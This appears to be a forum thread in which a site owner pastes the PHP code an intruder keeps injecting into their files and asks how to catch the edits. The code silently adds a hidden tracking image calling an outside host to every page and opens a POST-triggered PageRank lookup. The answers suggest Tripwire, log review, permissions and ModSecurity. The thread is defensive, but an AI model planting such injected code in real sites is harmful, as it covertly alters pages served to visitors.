# Setting a tripwire for file editing

Tags: ubuntu, ssh

The issue is this. There is **some** leak **somewhere** in my site that allows **someone** to edit files arbitrarily (or he has gotten access to FTP/SHH, but I don't see that in the logs).

He keeps injecting this code into different PHP files:

```
<?php
//{{27460aba

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;

$olderrxxx=error_reporting(0);

function outputxxx_callback($str)
{
  $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="g34dae82b267843a194c001f72"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82b267843a194c001f72&p=1&a=%3CR%C6%8E0%14%00M%049%F2%1F%D5%A2e%A8%84%A2%90%7B%AB%D0t%A3F%B7%BEi%D5%9B%D5%FD"></div></SPAN>';
  preg_match("|</body>|si",$str,$arr);
  return str_replace($arr[0],$links.$arr[0],$str);
}

function StrToNum($Str, $Check, $Magic)
{
   $Int32Unit = 4294967296;
   $length = strlen($Str);
   for ($i = 0; $i < $length; $i++) {
       $Check *= $Magic;
       if ($Check >= $Int32Unit) {
           $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
           $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
       }
       $Check += ord($Str{$i});
   }
   return $Check;
}
function HashURL($String)
{
   $Check1 = StrToNum($String, 0x1505, 0x21);
   $Check2 = StrToNum($String, 0, 0x1003F);

   $Check1 >>= 2;
   $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
   $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
   $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

   $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
   $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

   return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
   $CheckByte = 0;
   $Flag = 0;

   $HashStr = sprintf('%u', $Hashnum) ;
   $length = strlen($HashStr);

   for ($i = $length-1; $i >= 0;  $i--) {
       $Re = $HashStr{$i};
       if (1 === ($Flag % 2)) {
           $Re += $Re;
           $Re = (int)($Re / 10) + ($Re % 10);
       }
       $CheckByte += $Re;
       $Flag ++;
   }

   $CheckByte %= 10;
   if (0 !== $CheckByte) {
       $CheckByte = 10 - $CheckByte;
       if (1 === ($Flag % 2) ) {
           if (1 === ($CheckByte % 2)) {
               $CheckByte += 9;
           }
           $CheckByte >>= 1;
       }
   }

   return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
   $ch = CheckHash(HashURL($url));
   $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
   $data = file_get_contents($file);
   $pos = strpos($data, "Rank_");
   if($pos === false){return -1;} else{
       $pr=substr($data, $pos + 9);
       $pr=trim($pr);
       $pr=str_replace("
",'',$pr);
       return $pr;
   }
}

if(isset($_POST['xxxprch']))
{
    echo getpr($_POST['xxxprch']);
    exit();
}
else
  ob_start('outputxxx_callback');

error_reporting($olderrxxx);
}

//}}42011069
?>
```

This seems to be some tracking script. But my question is, can I somehow set a tripwire through SSH (I am root) that activates when someone tries to edit some files? I want to bust this guy (or girl) and find the leak.

Comment: Is this a CMS of some sort? If so, could they be exploiting a security hole in the software?

Comment: Oh, forgot to say, I don't use some mainstream CMS like Joomlah, I do use some self-made PHP scripts, so the leak might be in them. Though, I could confirm that by busting the php process, so even in that case this would be handy.

Comment: Is it possible your root password has been compromised?

Comment: @Justin Pearce: Nope, after some additional check the root seems to be uncompromised.

Answer (score 1, accepted):

Try checking out this solution:

http://www.thegeekstuff.com/2008/12/tripwire-tutorial-linux-host-based-intrusion-detection-system/

Hope this helps.

Comment: This seems nice :) +1

Answer (score 1):

Look at the time stamp of the modified file and then look at your Apache logs for the entries in that time window. This should give you an idea of the vector. Verify the permissions on your content, and make sure that the Apache user is not able to write to anything unless it is absolutely necessary. ModSecurity is also very helpful for preventing this type of attack; however, you need to understand how your web apps work.